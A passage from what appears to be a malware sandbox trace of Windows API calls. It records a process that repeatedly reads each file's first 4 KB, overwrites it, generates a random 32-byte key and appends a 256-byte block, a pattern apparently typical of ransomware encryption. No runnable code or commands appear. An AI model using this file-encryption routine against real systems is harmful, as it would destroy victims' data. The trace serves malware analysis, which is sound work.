lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.131] GetProcessHeap () returned 0x280000 [0079.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0079.131] GetProcessHeap () returned 0x280000 [0079.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0079.131] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0079.131] GetProcessHeap () returned 0x280000 [0079.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0079.131] ReadFile (in: hFile=0x868, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.211] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.212] WriteFile (in: hFile=0x868, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.212] GetProcessHeap () returned 0x280000 [0079.212] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.212] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.213] GetProcessHeap () returned 0x280000 [0079.213] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x1f8) returned 0x7dc1440 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.214] GetProcessHeap () returned 0x280000 [0079.214] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.215] GetProcessHeap () returned 0x280000 [0079.215] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.216] GetProcessHeap () returned 0x280000 [0079.216] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0079.216] SetFilePointerEx (in: hFile=0x868, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.216] WriteFile (in: hFile=0x868, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.216] WriteFile (in: hFile=0x868, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.217] GetProcessHeap () returned 0x280000 [0079.217] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0079.217] GetProcessHeap () returned 0x280000 [0079.217] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0079.217] GetProcessHeap () returned 0x280000 [0079.217] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0079.217] CloseHandle (hObject=0x868) returned 1 [0079.219] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 55 [0079.219] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.219] ReadFile (in: hFile=0x86c, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.219] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.219] GetProcessHeap () returned 0x280000 [0079.219] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0079.219] GetProcessHeap () returned 0x280000 [0079.219] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0079.220] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0079.220] GetProcessHeap () returned 0x280000 [0079.220] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0079.220] ReadFile (in: hFile=0x86c, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.315] SetFilePointerEx (in: hFile=0x86c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.315] WriteFile (in: hFile=0x86c, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.315] GetProcessHeap () returned 0x280000 [0079.315] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0079.315] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.316] GetProcessHeap () returned 0x280000 [0079.316] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.316] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0079.317] GetProcessHeap () returned 0x280000 [0079.317] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0079.317] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.318] GetProcessHeap () returned 0x280000 [0079.318] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.319] GetProcessHeap () returned 0x280000 [0079.319] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 